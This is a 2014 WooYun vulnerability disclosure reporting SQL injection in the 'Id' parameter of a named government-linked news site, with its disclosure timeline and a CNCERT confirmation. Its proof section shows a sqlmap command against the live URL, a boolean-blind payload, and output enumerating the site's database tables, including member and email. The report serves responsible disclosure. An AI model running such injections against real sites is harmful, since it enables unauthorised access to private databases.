当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065111

漏洞标题:人民论坛网SQL注入

相关厂商:人民论坛杂志社

漏洞作者: 路人甲

提交时间:2014-06-17 10:43

修复时间:2014-08-01 10:44

公开时间:2014-08-01 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-17: 细节已通知厂商并且等待厂商处理中
2014-06-21: 厂商已经确认,细节仅向厂商公开
2014-07-01: 细节向核心白帽子及相关领域专家公开
2014-07-11: 细节向普通白帽子公开
2014-07-21: 细节向实习白帽子公开
2014-08-01: 细节向公众公开

简要描述:

详细说明:

注入 www.pezx.gov.cn/linkclick.asp?Id=13

漏洞证明:

[root@Hacker~]# Sqlmap -u "www.pezx.gov.cn/linkclick.asp?Id=13" --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:24:54
[10:24:54] [INFO] resuming back-end DBMS 'microsoft access'
[10:24:55] [INFO] testing connection to the target URL
[10:24:55] [INFO] heuristics detected web page charset 'GB2312'
sqlmap got a 302 redirect to 'http://www.rmlt.com.cn/'. Do you want to follow? [
Y/n] y
[10:24:58] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=13 AND 2425=2425
---
[10:24:58] [INFO] the back-end DBMS is Microsoft Access
web application technology: Nginx
back-end DBMS: Microsoft Access
[10:24:58] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[10:24:58] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[10:24:58] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:24:58] [INFO] retrieved:
[10:24:59] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[10:24:59] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[10:24:59] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
[10:25:01] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[10:25:01] [INFO] checking table existence using items from 'E:\SQL?~1\SQLMAP~1.
4\Bin\txt\common-tables.txt'
[10:25:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 5
[10:25:02] [INFO] starting 5 threads
[10:25:15] [INFO] retrieved: config
[10:25:16] [INFO] retrieved: comments
[10:25:27] [INFO] retrieved: news
[10:26:10] [INFO] retrieved: member
[10:26:26] [INFO] retrieved: email
[10:27:51] [INFO] retrieved: content
Database: Microsoft_Access_masterdb
[6 tables]
+----------+
| comments |
| config |
| content |
| email |
| member |
| news |
+----------+
[10:29:59] [INFO] fetched data logged to text files under 'E:\SQL?~1\SQLMAP~1.4\
Bin\output\www.pezx.gov.cn'
[*] shutting down at 10:29:59

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-21 22:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心处置。

最新状态:

暂无